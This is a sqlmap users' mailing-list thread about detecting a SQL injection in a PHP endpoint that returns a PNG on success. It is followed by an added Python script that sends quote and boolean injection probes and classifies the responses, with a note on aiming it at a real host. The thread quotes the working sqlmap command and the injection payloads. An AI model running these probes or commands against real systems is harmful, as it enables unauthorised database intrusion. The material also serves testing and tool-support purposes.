My full options list was this to successfully exploit the sqli vectors, for future reference:
./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=mysql --force-ssl --tamper=between --drop-set-cookie --text-only

On Sun, Mar 30, 2014 at 9:24 AM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
> Always happy when issues are resolved by themselves :)
>
> Bye
>
> On Sun, Mar 30, 2014 at 4:01 PM, Brandon Perry <bperry.volat...@gmail.com> wrote:
>> Oh, it looks like I am an idiot, this was supposed to be over SSL, but I
>> was not passing --force-ssl.
>>
>> Sorry for the spam.
>>
>> On Sun, Mar 30, 2014 at 8:49 AM, Brandon Perry <bperry.volat...@gmail.com> wrote:
>>> FWIW --parse-errors also doesn't seem to affect the output during a scan
>>> on the URL.
>>>
>>> On Sun, Mar 30, 2014 at 8:33 AM, Brandon Perry <bperry.volat...@gmail.com> wrote:
>>>> Hi,
>>>>
>>>> I am playing around with an interesting SQL injection. A GET to a php
>>>> script with two params (date1 and date2) will generate a PNG when
>>>> successful, but will output a textual error message when, say, an
>>>> apostrophe is thrown in one of the dates.
>>>>
>>>> For instance, GET fdsa.php?date1=2014-02-28&date2=2014-03-30 will
>>>> result in a PNG.
>>>>
>>>> GET fdsa.php?date1=2014-02-28&date2=2014-03-30' (note apostrophe in
>>>> last param) will yield:
>>>>
>>>> You have an error in your SQL syntax; check the manual that corresponds
>>>> to your MySQL server version for the right syntax to use near 'admin' AND
>>>> a.sid=i.sid and i.ref IN (SELECT ref from Itablet)' at line 4
>>>>
>>>> GET fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1 will result
>>>> in a PNG
>>>>
>>>> Since the result of a successful query is a PNG, I only expect to be
>>>> able to use an error-based, or boolean/time-based attacks. However, sqlmap
>>>> doesn't detect that either of the params are injectable (both are).
>>>>
>>>> [06:04:13] [WARNING] GET parameter 'date1' does not appear dynamic
>>>> [06:04:13] [WARNING] heuristic (basic) test shows that GET parameter
>>>> 'date1' might not be injectable
>>>>
>>>> I have tried using --text-only and am not using -o, but to no avail.
>>>> Any thoughts on some tricks I can try to see if sqlmap will be able to
>>>> exploit the injection points?
>>>>
>>>> I can send a traffic file if that helps. Currently on latest.
>>>>
>>>> bperry@ubuntu:~/tools/sqlmap$ git pull
>>>> Already up-to-date.
>>>> bperry@ubuntu:~/tools/sqlmap$
>>>>
>>>> --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
>>>
>>
>> ------------------------------------------------------------------------------
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
------------------------------------------------------------------------------
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
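The original post describes a target whose "true" response is a PNG and whose "error" response is MySQL's syntax-error text, which is awkward for a generic page-diff heuristic. The script below is an added example, not part of the thread and not sqlmap code: it hand-rolls the three probes from the post (baseline, lone apostrophe, `' and '1'='1`, plus a false counterpart) and classifies each response by PNG magic bytes and the MySQL error string instead of by text similarity. The target `fake_fdsa` is a constructed stand-in for the real fdsa.php; its behaviour for a false condition (empty 200 body) is an assumption, since the post does not say what the real script returns in that case. The `fetch` callable, `classify`, `probe` and `detect` names are mine.

```python
"""
Content-type oracle for a SQL injection whose success response is a binary
image. Added example; the target below is a constructed stand-in, not the
script from the mailing-list thread.
"""
import re
from urllib.parse import parse_qs, urlencode, urlparse

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
MYSQL_ERROR_RE = re.compile(rb"You have an error in your SQL syntax")


def fake_fdsa(url):
    """Constructed stand-in for fdsa.php (assumption, not the real app).

    Mirrors what the post reports: an unbalanced quote in either date
    parameter yields a MySQL syntax error, a balanced true condition
    yields a PNG. A balanced false condition returning an empty body is
    an assumption made for this example.
    """
    qs = parse_qs(urlparse(url).query, keep_blank_values=True)
    for value in qs.get("date1", []) + qs.get("date2", []):
        if value.count("'") % 2 == 1:          # unbalanced quote -> syntax error
            return ("text/html", b"You have an error in your SQL syntax; "
                                 b"check the manual that corresponds to your "
                                 b"MySQL server version ... at line 4")
        if "'1'='2" in value:                  # assumed false-branch behaviour
            return ("text/html", b"")
    return ("image/png", PNG_MAGIC + b"\x00\x00\x00\rIHDR")


def classify(content_type, body):
    """Label a response by what the body actually is, not by text diffing."""
    if body.startswith(PNG_MAGIC):
        return "png"
    if MYSQL_ERROR_RE.search(body):
        return "sql_error"
    return "other"


def probe(fetch, base_url, param, payload):
    """Append payload to one query parameter and classify the response."""
    parsed = urlparse(base_url)
    qs = parse_qs(parsed.query, keep_blank_values=True)
    qs[param] = [qs[param][0] + payload]
    url = parsed._replace(query=urlencode(qs, doseq=True)).geturl()
    return classify(*fetch(url))


def detect(fetch, base_url, param):
    """Run the probes from the post and report which techniques look viable."""
    results = {
        "baseline": probe(fetch, base_url, param, ""),
        "apostrophe": probe(fetch, base_url, param, "'"),
        "true": probe(fetch, base_url, param, "' and '1'='1"),
        "false": probe(fetch, base_url, param, "' and '1'='2"),
    }
    # Error-based: a bare quote leaks a database error message.
    error_based = results["apostrophe"] == "sql_error"
    # Boolean-based: true condition looks like baseline, false does not.
    boolean_based = (results["baseline"] == "png"
                     and results["true"] == "png"
                     and results["false"] != "png")
    return {"results": results, "error_based": error_based,
            "boolean_based": boolean_based}


if __name__ == "__main__":
    base = "https://target.example/fdsa.php?date1=2014-02-28&date2=2014-03-30"
    for p in ("date1", "date2"):
        print(p, detect(fake_fdsa, base, p))
```

To point this at a real host, replace `fake_fdsa` with a function that issues the GET (over TLS, which is the detail that tripped the original run) and returns `(content_type, body_bytes)`; the classification and the verdict logic stay the same.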